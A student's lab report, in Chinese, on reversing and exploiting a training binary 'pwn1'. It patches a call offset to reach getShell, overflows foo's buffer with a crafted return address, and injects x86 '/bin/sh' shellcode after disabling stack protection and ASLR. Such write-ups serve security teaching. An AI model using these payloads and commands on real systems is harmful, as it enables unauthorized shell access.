20164318 毛瀚逸 Exp1 PC平台逆向破解

一、逆向及Bof基础实践说明

1.1实践目标

• 本次实践的对象是一个名为pwn1的linux可执行文件。
• 该程序正常执行流程是：main调用foo函数,foo函数会简单回显任何用户输入的字符串。
• 手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。
• 利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。
• 注入一个自己制作的shellcode并运行这段shellcode。

1.2实践内容

• 手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。
• 利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。
• 注入一个自己制作的shellcode并运行这段shellcode。
• 这几种思路，基本代表现实情况中的攻击目标：

1. 运行原本不可访问的代码片段
2. 强行修改程序执行流
3. 以及注入运行任意代码

（注：进行实验前，记得备份Pwn1文件，后续需要使用三次）

1.3基础知识

1. 掌握NOP，JNE,JE,JMP,CMP汇编指令的机器码

          NOP指令：“空指令”。执行到NOP指令时，CPU什么也不做，仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。

          JNE指令：条件转移指令（等同于“jump not equal”）,如果不相等则跳转。

          JE指令：条件转移指令，如果相等则跳转。

          JMP指令：无条件跳转指令。无条件跳转指令可转到内存中任何程序段。转移地址可在指令中给出，也可以在寄存器中给出，或在存储器中指出。

          CMP指令：比较指令，功能相当于减法指令，只是对操作数之间运算比较，不保存结果。cmp指令执行后，相对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。

          2.掌握反汇编与十六进制编程器

objdump反汇编命令：

objdump -f test     //显示test的文件头信息
objdump -d test    //反汇编test中的需要执行指令的那些section
objdump -D test    //与-d类似，但反汇编test中的所有section
objdump -h test    //显示test的Section Header信息
objdump -x test    //显示test的全部Header信息
objdump -s test    //除了显示test的全部Header信息，还显示他们对应的十六进制文件代码    


xxd命令：

用vi命令打开一个文件，在vi命令模式下输入
:%!xxd            //回车后，该文件会以十六进制形式显示
:%!xxd -r         //参数-r是指将当前的十六进制转换为二进制

二、实验过程

1.1使用objdump -d pwn1命令反汇编

找到相应的main、foo、getshell等字段

此处可以看出80484b5的call调用了位于8048491的foo()函数，e8的作用是跳转，而d7则是相应跳转的地址，那么将d7改为getshell的地址则就可以在程序运行时，触发getshell。

那么d7为补码，逐位取反加一后，变为-29，即可得出地址偏移量，由此得出应该修改的地址为c3

vi pwn1 修改机器指令代码

再使用%!xxd转换为16进制

更改后可得

得到最终效果

 2.1通过构造输入参数，造成BOF攻击，改变程序执行流

打开运行后，发现过长的字符会导致出错

通过gdb分析后，发现此处只能有32个字符，那么多的字符呢？

 进一步分析，发现eip中对应的ascii码是1234，所以将此处的值修改为getshell的内存地址即可触发。

因此输入11111111222222223333333344444444\x7d\x84\x04\x08即可完成。

3.1注入shellcode并运行

首先用apt-get install execstack安装execstack

然后输入

execstack -s pwn1（设置堆栈可执行）
execstack -q pwn1（查询堆栈是否可执行）
more /proc/sys/kernel/randomize_va_space（查看地址是否随机化，0为否，2为开）
echo "0" > /proc/sys/kernel/randomize_va_space （更改地址不随机化）

more /proc/sys/kernel/randomize_va_space（确认一下）

根据上课内容，我们输入perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode

然后我们需要确认变更的地址内容

所以我们继续输入(cat input_shellcode;cat) | ./pwn1（将内容注入）

此时打开另一个终端，输入ps -ef | grep pwn1查询进程号

然后启动gdb调试，并反汇编foo()

在080484ae设置断点，然后在另一个终端触发运行

完成。

四、实验心得

这是我们第一次在linux上面操作，和windows图形化的界面不同，kali的操作非常不习惯，但是在同学的指导下也一步步的习惯了。同时对与网络攻防也有了全新的认识，网络攻防是基于各式各样程序、协议的漏洞来“钻空子”，达到正常手段不能获取的信息、权限等等。

五、漏洞的危害

漏洞是指程序、系统、协议等等计算机软件在逻辑、地址分配等等上有缺陷，使攻击者得以利用。